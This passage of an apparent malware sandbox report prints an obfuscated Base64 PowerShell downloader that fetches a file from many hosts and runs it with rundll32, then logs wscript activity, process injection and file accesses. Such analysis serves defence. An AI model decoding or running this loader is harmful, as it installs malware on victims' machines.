EEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
parent_process wscript.exe martian_process "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries
parent_process wscript.exe martian_process wscript "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries
Process injection Process 2552 resumed a thread in remote process 2688
Process injection Process 2688 resumed a thread in remote process 2812
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002f4
suspend_count: 1
process_identifier: 2688
1 0 0

NtResumeThread

 thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2812
1 0 0
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe